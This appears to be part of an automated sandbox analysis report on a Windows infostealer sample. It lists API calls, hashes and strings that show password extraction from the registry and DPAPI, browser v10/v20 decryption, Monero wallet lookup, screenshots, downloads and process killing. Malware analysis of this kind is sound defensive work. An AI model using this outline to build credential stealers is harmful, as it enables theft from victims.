                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: dc086ec0d5845ca1d0edec3f75f4eef363336d99798de9cee070abc5a9c6aa86
                            • Instruction ID: 24356ef8d02d285641aaa824717258c48474caa3257926e4524b959e245a0ec3
                            • Opcode Fuzzy Hash: dc086ec0d5845ca1d0edec3f75f4eef363336d99798de9cee070abc5a9c6aa86
                            • Instruction Fuzzy Hash: C0515171A017299BDB11DFA8DC84A9EBBF9EF94300F044575E509E3391DF74AE058BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1EFE4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F012
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B1F026
                            • lstrlen.KERNEL32(00000000), ref: 00B1F035
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00B1F053
                            • StrStrA.SHLWAPI(00000000,?), ref: 00B1F081
                            • lstrlen.KERNEL32(?), ref: 00B1F094
                            • lstrlen.KERNEL32(00000000), ref: 00B1F0B2
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00B1F0FF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00B1F13F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 5f7818d142017dbc6f55f4bf2c51715dd08eb4edd44dc8d8a31ec297dee07707
                            • Instruction ID: 48b1f6656d432b171d128dc8cc8926956c9430bf1fe5a8fc1c63e1208fb9a28b
                            • Opcode Fuzzy Hash: 5f7818d142017dbc6f55f4bf2c51715dd08eb4edd44dc8d8a31ec297dee07707
                            • Instruction Fuzzy Hash: 53516D31A102069BCB21AF78DC49AAE7BE5EF54300F5545B8F84AEB252DF70DC49CB90
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(01878998,00D39BD8,0000FFFF), ref: 00B0A026
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0A053
                            • lstrlen.KERNEL32(00D39BD8), ref: 00B0A060
                            • lstrcpy.KERNEL32(00000000,00D39BD8), ref: 00B0A08A
                            • lstrlen.KERNEL32(00B34C4C), ref: 00B0A095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0A0B2
                            • lstrcat.KERNEL32(00000000,00B34C4C), ref: 00B0A0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0A0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0A0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0A114
                            • SetEnvironmentVariableA.KERNEL32(01878998,00000000), ref: 00B0A12F
                            • LoadLibraryA.KERNEL32(01865208), ref: 00B0A143
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: 5b9b8d4b3a13faa09f2b20909631d1625dd2b2abe3c2e2a4c9d66d22f80ef9a0
                            • Instruction ID: 7a5b254f3c70a13fe67609e953206876cd5f6708ad4a77e22e8f25441f967c3a
                            • Opcode Fuzzy Hash: 5b9b8d4b3a13faa09f2b20909631d1625dd2b2abe3c2e2a4c9d66d22f80ef9a0
                            • Instruction Fuzzy Hash: DD918D30A00B009FD7319FA8DC88A663BE5EB94705F4049A8F505D73E2EFB5DD449BA2
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1C8A2
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1C8D1
                            • lstrlen.KERNEL32(00000000), ref: 00B1C8FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1C932
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B1C943
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 0c5ae843efac5c5f6f25d7350551dda9f5d1f3ea7609f87bac523c4d061acbaf
                            • Instruction ID: 741997d0187eb4e15ced63ac7775d93047ca92641fa74acdad10c9cb9576fc85
                            • Opcode Fuzzy Hash: 0c5ae843efac5c5f6f25d7350551dda9f5d1f3ea7609f87bac523c4d061acbaf
                            • Instruction Fuzzy Hash: 7661B271E513199BDB12EFB4C889AEEBFF8EF09740F5400A5E841E7241DB749D498BA0
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00B20CF0), ref: 00B24276
                            • GetDesktopWindow.USER32 ref: 00B24280
                            • GetWindowRect.USER32(00000000,?), ref: 00B2428D
                            • SelectObject.GDI32(00000000,00000000), ref: 00B242BF
                            • GetHGlobalFromStream.COMBASE(00B20CF0,?), ref: 00B24336
                            • GlobalLock.KERNEL32(?), ref: 00B24340
                            • GlobalSize.KERNEL32(?), ref: 00B2434D
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 86d586084898d8f0026535af74616162fbebe670a8291117652516d68c6a9817
                            • Instruction ID: 1d471afee582bbb786e5e0dfd60b8e2d705055c182a579d2a599489ee92c09a6
                            • Opcode Fuzzy Hash: 86d586084898d8f0026535af74616162fbebe670a8291117652516d68c6a9817
                            • Instruction Fuzzy Hash: FF510C75A10309AFDB10DFA4ED89AAEBBB9EF48301F104569F905E3250DB74AD05CBA0
                            APIs
                            • lstrcat.KERNEL32(?,0187EE88), ref: 00B1E00D
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1E037
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E07D
                            • lstrcat.KERNEL32(?,?), ref: 00B1E098
                            • lstrcat.KERNEL32(?,?), ref: 00B1E0AC
                            • lstrcat.KERNEL32(?,0186A938), ref: 00B1E0C0
                            • lstrcat.KERNEL32(?,?), ref: 00B1E0D4
                            • lstrcat.KERNEL32(?,0187DB10), ref: 00B1E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B1E126
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: 22e246756b6d0df3d750596389f8987a75c3f1bac8bde10bec2eb33343e00109
                            • Instruction ID: c572de3daca8cd3800db6b7179892f8a4f22976f38c863390634b73279820ae8
                            • Opcode Fuzzy Hash: 22e246756b6d0df3d750596389f8987a75c3f1bac8bde10bec2eb33343e00109
                            • Instruction Fuzzy Hash: 27615C7191021CABCB55DB64CC59ADDB7F4BF48300F5049E5AA1AE3290DF70AF898F90
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B06AFF
                            • InternetOpenA.WININET(00B2CFEC,00000001,00000000,00000000,00000000), ref: 00B06B2C
                            • StrCmpCA.SHLWAPI(?,0187F178), ref: 00B06B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00B06B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B06B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00B06BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00B06BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00B06BF0
                            • CloseHandle.KERNEL32(00000000), ref: 00B06C10
                            • InternetCloseHandle.WININET(00000000), ref: 00B06C17
                            • InternetCloseHandle.WININET(?), ref: 00B06C21
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: 5cc706e56f606cb99b2362af291456188d927142239458702868a3a67ba7eb41
                            • Instruction ID: 9d7a30ceb7c22bcc1191438d0112a73d5e816655658ba3aa2747357be74c9c4c
                            • Opcode Fuzzy Hash: 5cc706e56f606cb99b2362af291456188d927142239458702868a3a67ba7eb41
                            • Instruction Fuzzy Hash: B14131B1600315ABDB24DB64DC86FAE7BA8EF44701F1045A4FA05E72D0DF70AD459BA4
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0BC1F
                            • lstrlen.KERNEL32(00000000), ref: 00B0BC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0BC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0BC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0BCAC
                            • lstrlen.KERNEL32(00B34AD4), ref: 00B0BD23
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 950a0ca569d4e87036510bdb75d0a1ddaf6b11c9208d640c44d4ef4223e14d36
                            • Instruction ID: 5336df590c2b964037683da6dba63dd7dfc89d40dd918b0b6adecac52ca29eb7
                            • Opcode Fuzzy Hash: 950a0ca569d4e87036510bdb75d0a1ddaf6b11c9208d640c44d4ef4223e14d36
                            • Instruction Fuzzy Hash: 89A11B306113058FDB25DF68D949AAABBF4EF44305F1885B9E806EB3A1DB35DC46CB50
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25F2A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25F49
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00B26014
                            • memmove.MSVCRT(00000000,00000000,?), ref: 00B2609F
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B260D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: b3b16f256049e09261d1f05fb710fedf8e15266d4a2a61efa3847cc17e3545c5
                            • Instruction ID: 36b4d0aca88df8709e14492e0b442486f6971ac7cfc17b467a26605c686cff03
                            • Opcode Fuzzy Hash: b3b16f256049e09261d1f05fb710fedf8e15266d4a2a61efa3847cc17e3545c5
                            • Instruction Fuzzy Hash: FE619E70B00524DBDB28CF5CEDD496EB3F6EF84704B244A99E59A87381D731ED809B94
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E07D
                            • lstrcat.KERNEL32(?,?), ref: 00B1E098
                            • lstrcat.KERNEL32(?,?), ref: 00B1E0AC
                            • lstrcat.KERNEL32(?,0186A938), ref: 00B1E0C0
                            • lstrcat.KERNEL32(?,?), ref: 00B1E0D4
                            • lstrcat.KERNEL32(?,0187DB10), ref: 00B1E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B1E126
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 9ddb1d24382ad66cdd540ab578506ec64fb98bce84172893cbf7cf31c0ddce6d
                            • Instruction ID: 0b71b1ba44a09d808aa3cd2c42383357df925d013ee1e0a0ec500e6f5d11c37d
                            • Opcode Fuzzy Hash: 9ddb1d24382ad66cdd540ab578506ec64fb98bce84172893cbf7cf31c0ddce6d
                            • Instruction Fuzzy Hash: 66411C71910218ABCB25EB68DC49ADDB7B4BF48310F5049E5B91AA3251DB709F898BA0
                            APIs
                              • Part of subcall function 00B077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B07805
                              • Part of subcall function 00B077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00B0784A
                              • Part of subcall function 00B077D0: StrStrA.SHLWAPI(?,Password), ref: 00B078B8
                              • Part of subcall function 00B077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B078EC
                              • Part of subcall function 00B077D0: HeapFree.KERNEL32(00000000), ref: 00B078F3
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B07A90
                            • lstrcat.KERNEL32(00000000,?), ref: 00B07ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 00B07ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 00B07AF0
                            • wsprintfA.USER32 ref: 00B07B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B07B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B07B47
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B07B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 612a0939652ad2fcee9e3729c7e2884e3bec69ba8bfa05803c866e0fda88fb02
                            • Instruction ID: 5e2ed06dad3ca05e41bac2179924bf81a2d1d7ff88e2cc663719f6dcc88a3d80
                            • Opcode Fuzzy Hash: 612a0939652ad2fcee9e3729c7e2884e3bec69ba8bfa05803c866e0fda88fb02
                            • Instruction Fuzzy Hash: A7319E72A40314AFCB14DBA8DC949AAFBF9EB84300B244599F506E3390DF71B905DBA0
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B1820C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B18243
                            • lstrlen.KERNEL32(00000000), ref: 00B18260
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B18297
                            • lstrlen.KERNEL32(00000000), ref: 00B182B4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B182EB
                            • lstrlen.KERNEL32(00000000), ref: 00B18308
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B18337
                            • lstrlen.KERNEL32(00000000), ref: 00B18351
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B18380
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: a238d8ba7450ef124eca4f37195c86ad429497f9bdec046e40ec3b290ef711f3
                            • Instruction ID: 253445dae3d563b1c5a074047a1a1410d5ef39398019d5166f83f86d48473dd2
                            • Opcode Fuzzy Hash: a238d8ba7450ef124eca4f37195c86ad429497f9bdec046e40ec3b290ef711f3
                            • Instruction Fuzzy Hash: 2C515D71A006029BDB14DF28E898AAAFBE4FF44740F5545A4BD16EB244DF30ED94CBE0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B07805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00B0784A
                            • StrStrA.SHLWAPI(?,Password), ref: 00B078B8
                              • Part of subcall function 00B07750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B0775E
                              • Part of subcall function 00B07750: RtlAllocateHeap.NTDLL(00000000), ref: 00B07765
                              • Part of subcall function 00B07750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B0778D
                              • Part of subcall function 00B07750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00B077AD
                              • Part of subcall function 00B07750: LocalFree.KERNEL32(?), ref: 00B077B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B078EC
                            • HeapFree.KERNEL32(00000000), ref: 00B078F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00B07A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: 5fe4e871fb024e7474a43688a5854becfc892d957983007411ac10802712eab9
                            • Instruction ID: 734bdb36477751bc9aeb5b840e3be4691ef52e5505f365f0626e03164c2228f1
                            • Opcode Fuzzy Hash: 5fe4e871fb024e7474a43688a5854becfc892d957983007411ac10802712eab9
                            • Instruction Fuzzy Hash: 37711DB1D4021DABDB10DF95DC849DEFBF8EF44300F1045A9E609A7250EB71AE89CBA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00B14F39), ref: 00B24545
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B2454C
                            • wsprintfW.USER32 ref: 00B2455B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00B245CA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00B245D9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 00B245E0
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                            • String ID: %hs
                            • API String ID: 885711575-2783943728
                            • Opcode ID: c5162009ecb67202fdb141bc6ebba5df8dfe9c3e83bb7df26425b4736ce3e6b2
                            • Instruction ID: 8c5cbb02dbfc9d09ef788c50386b4891f4b51e67da0af97fad0ec1739f484687
                            • Opcode Fuzzy Hash: c5162009ecb67202fdb141bc6ebba5df8dfe9c3e83bb7df26425b4736ce3e6b2
                            • Instruction Fuzzy Hash: 3F315072A00315ABDB10DBA4EC45FDEB7B8EF45700F104155FA09E7280DBB0AA458BA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B01135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B0113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00B01159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00B01173
                            • RegCloseKey.ADVAPI32(?), ref: 00B0117D
                            Strings
                            • wallet_path, xrefs: 00B0116D
                            • SOFTWARE\monero-project\monero-core, xrefs: 00B0114F
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: 1f0130a10c699bed182389dfd1580d0103ab288d0911cf36261d42751f40b0a8
                            • Instruction ID: 7d4df9c6cffc0b98635446080b91fa3aa92d3e2f28670a0dc2d7399fbad89eaa
                            • Opcode Fuzzy Hash: 1f0130a10c699bed182389dfd1580d0103ab288d0911cf36261d42751f40b0a8
                            • Instruction Fuzzy Hash: F3F01DB5640308BBD7149BA59C8DEAABB7CEB04715F100194BE05E2290EAB05A4497B0
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 00B09E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 00B09E42
                            • LocalAlloc.KERNEL32(00000040), ref: 00B09EA7
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            • lstrcpy.KERNEL32(00000000,00B34C48), ref: 00B09FB2
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: 05bc09ca6e3f5b0a31620cf9e0b38ae481caf0c4250e47f4e842fe55e32e2428
                            • Instruction ID: b0bfe06ff443721327cc8b5e7d126d366351333938a8d869404611c2f1a1d6be
                            • Opcode Fuzzy Hash: 05bc09ca6e3f5b0a31620cf9e0b38ae481caf0c4250e47f4e842fe55e32e2428
                            • Instruction Fuzzy Hash: A051AE31A1021A9BDB10EF68DC85B9E7BE8FF50314F1544B4F949EB292DB70ED098B90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B0565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B05661
                            • InternetOpenA.WININET(00B2CFEC,00000000,00000000,00000000,00000000), ref: 00B05677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00B05692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00B056BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 00B056E1
                            • InternetCloseHandle.WININET(?), ref: 00B056FA
                            • InternetCloseHandle.WININET(00000000), ref: 00B05701
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: e33b81075f7ae89914fb9d282ad6ba6383f6154c5366a4befc3b73c52bbcde9d
                            • Instruction ID: 74c0b45d718f26b4ddc0d553cf16d7f47e5f08079bc0a6c3ee7b02c5cae2c66b
                            • Opcode Fuzzy Hash: e33b81075f7ae89914fb9d282ad6ba6383f6154c5366a4befc3b73c52bbcde9d
                            • Instruction Fuzzy Hash: F3414C71A00705AFDB24CF54DD88B9ABBE8FF48300F1480A9E909DB291D771AD42CFA4
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00B24759
                            • Process32First.KERNEL32(00000000,00000128), ref: 00B24769
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B2477B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2479C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B247AB
                            • CloseHandle.KERNEL32(00000000), ref: 00B247B2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B247C0
                            • CloseHandle.KERNEL32(00000000), ref: 00B247CB
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: cc19b7db019fb1bd60e478d0bdc58f13a809250cde874bb136adfa373eb532d8
                            • Instruction ID: 145ac674d7cc1d68f293f64bf40f57103c4acce608ab5238f453b433fd2bf2b3
                            • Opcode Fuzzy Hash: cc19b7db019fb1bd60e478d0bdc58f13a809250cde874bb136adfa373eb532d8
                            • Instruction Fuzzy Hash: 62017571601324ABE7215B70ACC9FEAB7BCEF49751F0006D4F919D12A1EFB49D908A70
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B18435
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1846C
                            • lstrlen.KERNEL32(00000000), ref: 00B184B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B184E9
                            • lstrlen.KERNEL32(00000000), ref: 00B184FF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1852E
                            • StrCmpCA.SHLWAPI(00000000,00B34C3C), ref: 00B1853E
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 5fe1289647bac9f9b747de531a1f55eb8ed7a3c2cfc46700cae33b2806ba21a6
                            • Instruction ID: 8cb7de8e722d11923c61b6e12b06a9812e16dee50cdccdee0fa661698065924c
                            • Opcode Fuzzy Hash: 5fe1289647bac9f9b747de531a1f55eb8ed7a3c2cfc46700cae33b2806ba21a6
                            • Instruction Fuzzy Hash: 275160715002069FCB24DF68D998A9ABBF5FF58700F248499EC46DB345EF30E985CB60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00B22925
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B2292C
                            • RegOpenKeyExA.ADVAPI32(80000002,0186BE18,00000000,00020119,00B228A9), ref: 00B2294B
                            • RegQueryValueExA.ADVAPI32(00B228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00B22965
                            • RegCloseKey.ADVAPI32(00B228A9), ref: 00B2296F
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 4f2866399bc49f58d4b60a78ca3c8e51283a6e9fae989acda73772c9a55c0774
                            • Instruction ID: e18067eb16412a07da3fbcc5ff4e330913dcbbd8cbcb3315897d00dcd7491a7f
                            • Opcode Fuzzy Hash: 4f2866399bc49f58d4b60a78ca3c8e51283a6e9fae989acda73772c9a55c0774
                            • Instruction Fuzzy Hash: 4D017C75600329BBD724CBA4EC59EBBBBBCEB48755F200098FE49D7350EA71594887A0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00B22895
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B2289C
                              • Part of subcall function 00B22910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00B22925
                              • Part of subcall function 00B22910: RtlAllocateHeap.NTDLL(00000000), ref: 00B2292C
                              • Part of subcall function 00B22910: RegOpenKeyExA.ADVAPI32(80000002,0186BE18,00000000,00020119,00B228A9), ref: 00B2294B
